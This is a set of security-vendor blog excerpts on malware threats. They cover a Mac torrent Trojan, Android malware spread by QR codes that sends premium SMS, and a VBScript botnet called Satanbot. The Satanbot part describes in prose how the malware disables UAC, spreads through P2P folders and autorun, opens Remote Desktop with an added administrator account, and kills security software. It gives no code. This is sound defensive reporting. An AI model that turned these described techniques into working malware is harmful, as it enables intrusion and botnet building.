It's possible that other apps have also been distributed via torrent sites infected by the malware, or that the cybercriminals will use other methods to distribute their Trojan horse.

Clearly, Mac users - like their Windows cousins - should practice safe computing and only download software from official websites and legitimate download services. But, in addition to that, it's becoming clearer every week that Mac users need to take malware protection more seriously by running anti-virus software.
There may be a lot less malware for Mac OS X than there is for Windows, but many Mac users are making themselves an unnecessarily soft target by imagining that they are somehow magically protected from threats.

There are a number of anti-virus products available for Mac, including Sophos's free version for home users, so there's really no excuse.

Read More...

Android Malware Spreads Through QR Code

Last week, there was quite a buzz in the mobile-malware researchers community about a new Android malware. It came to light not because of its sophistication or complexity but due to the simple method that it uses to spread.

Most Android malware we have witnessed are repackaged malicious apps made available in black markets or third-party markets. This latest Android malware follows the same repacking path as its precursors. The only difference with this malware is that it uses quick response (QR) code to distribute the malicious link. We have already discussed in a recent blog that QR code can be used by attackers to spread malicious files.

A QR code is a type of matrix barcode to store information. These codes are increasingly found on product labels, billboards, and business cards. Why are QR codes so popular? The amount of data they hold. QR codes can carry 7,089 numeric characters or 4,296 alphanumeric characters and can store up to 2KB of data.

All one needs is a smart phone with a camera and QR reader application to scan these codes. The codes can direct users to websites or online videos, and send text messages and emails.

 

QR code points to McAfee.com

If you scan the QR code above with any QR code reader using your smart phone, it will redirect you to our site http://www.mcafee.com Attackers use these codes to redirect users to URLs that ask users to download malicious applications.

Malicious QR code

Analyzing the payload

Once users download a malicious application onto their mobile devices, they need to install it. This malicious app is the Trojanized Jimm application, which is a mobile ICQ client. The payload is nothing new, as we have already seen these behaviors in the past with other Android malware such as Android/FakePlayer.A and Android/HippoSMS.A. The latter sends SMS’s to premium numbers.

 

This malicious application requires the following user permissions:

User permission request by the application

Once installed, the malware sends an SMS to a premium number that charges users. The application has the following icon:

The application icon

We have also seen the JAR version of this application; it targets the J2ME mobile phones and sends SMS’s to premium numbers. When I installed the malicious .jar package in a test environment, it displayed the following message:

 

Installing the malicious application

It prompted me to select a country and then displayed the next message:

Finally the malware tries to send messages to premium numbers from the infected mobile. Because I was executing this application in a controlled environment, it told me I didn’t have a sufficient balance in my account to send the message. But I did confirm that it tried to send messages, as seen below:

In the recent blog about QR codes by my colleague Jimmy Shah, he suggested how to stay away from such attacks. Our advice has not changed: Use a mobile QR code-/barcode-scanning app that previews URLs, and avoid scanning suspicious codes.

McAfee products detect these malware in our latest DATs as Android/SMS.gen and J2ME/Jifake.a. Read More...

Satanbot Employs VBScript to Create Botnet

Malware is on the rise. At the beginning of 2008, our malware collection had 10 million samples. Today we have already surpassed 70 million. Most of the malicious samples are Trojans (backdoors, downloaders, fake alerts), but there are also a lot of viruses, worms, and bots that in a short time can infect many computers without user interaction. Usually the malicious code comes in a form of an executable or DLL, but sometimes malware authors opt to use alternate languages such as VBScript (Visual Basic Scripting Edition), a lightweight Active Scripting language that is installed by default in most Microsoft Windows versions since Windows 98. One example of this kind of malware is Satanbot: a fully functional VBScript botnet that uses the Remote Desktop Connection to connect to infected systems.

VBScript files are usually in clear text because they are interpreted at runtime, rather than being compiled previously by the author. However, for cases in which the user wants to avoid allowing others to view or modify the source code, Microsoft provides a command-line tool, Script Encoder, which will encode the final script by generating a .vbe file. This file looks like a normal executable, but it can be decoded to its original form. Once that file is decoded, we can look at the bot’s source code, which is divided by sections. Each section specifies a different function of Satanbot, most of which we’ve already seen in AutoRun worms like Xirtem. Here is a description of these functions:

1.  Enable CMD and REGEDIT: To perform all the changes in the system (modify the registry and execute BAT files), the edition of the registry (regedit) or the use of the command line (cmd) will be enabled by changing the values “DisableRegistryTools” and “DisableCMD” to 0. In addition, one AutoRun feature is configured by creating the value “Update” in the “Run” key with the path of the script, along with hiding files and file extensions in the system.
2. Disable UAC: The value “EnableLUA” is checked to verify whether it is necessary to disable the User Account Control in Windows Vista, Windows Server 2008 and Windows 7. If it is enabled, the script will create on the fly another script and a BAT file to disable UAC. Another modification in the registry is done to perform operations that require elevation of privileges without consent or credentials. At the end, all the temporary files used to do the modifications in the system will be deleted.
3. Take ownership of folders: The command TAKEOWN (in Windows Vista and 7) runs to take ownership and enable the modification of folders including Application Data, Cookies, and Local Settings
4. Self-Install and spread: Another BAT file in the %TEMP% path is created. It first changes the icon of .vbe files to the one used by Windows pictures so the user will think that it is a picture and not the malware. Also the original .vbe, along with a shortcut file, will be copied in several locations, including network shares and peer-to-peer shared folders from popular clients like eMule, LimeWire, and Ares. Another spreading vector this malware uses is infecting removable drives by creating autorun.inf files along with a copy of the original .vbe and a shortcut (.lnk) file.
5. Worm test: This may seem a confusing term, but it is another spreading method. The original .vbe will be copied to other folders such as Startup and %Userprofile%\ Microsoft with the name “System File [Not Delete]” to trick the user to not delete the file.
6. Worm.s@tan: Contains a loop that will trigger the execution of the code every 60 minutes
7. Backdoor: Using another temporary BAT file, the malware will enable Remote Desktop Access by making the following changes to the system:

• Allow unsolicited remote assistance and full control
• Allow the use of blank passwords
• Enable multiple concurrent remote desktop connections (with a maximum of five)
• Automatically start the Terminal Service
• Open port 3389 in the Windows firewall
• Add an administrator user to the system
• Start the Remote Desktop Services UserMode port redirector service
• Create a file in the bot’s path with an “OK” inside
• The foregoing commands execute on reboot while the message “Windows repare quelques fichiers, patientez …” (Windows is repairing some files, wait …) appears to the user at the command prompt.

Another interesting part of the code is the section Compt.Bot, from which the malware sends an HTTP POST request with a specific user agent to the URL of the botnet command server. With that request, the server can get the public IP address of the infected machine, which probably has Remote Desktop Access enabled with the required specifications so the bad guys can connect. By opening that URL in the browser, we can see the IP address of the machine that is connected to the control panel and the number of compromised machines, which can grow very quickly. Take a look at this 24-hour comparison:



Other functionalities of the botnet:

• Delete browser and user histories of some common software: Internet Explorer, Firefox, Chrome, Thunderbird, and Skype
• Terminate processes of security software by downloading and executing a batch file that can be easily updated with more processes
• Download an .exe file from another URL (currently offline). We need to examine this file more thoroughly, but one of its purposes seems to be updating the malware by executing a different embedded .vbe.

Even if VBScript is not the best language to hide malicious activities (using encryption, obfuscation, packers, antidebuggers, or anti-virtual machine features), it is pretty effective when we take into account the rate of infection in just one day. In addition, those scripts can build a botnet of infected machines that can be controlled by using a Remote Desktop connection, which allows the attacker to perform any action in the system. The malicious files related to this threat are detected by McAfee products as VBS/Satanbot. Read More...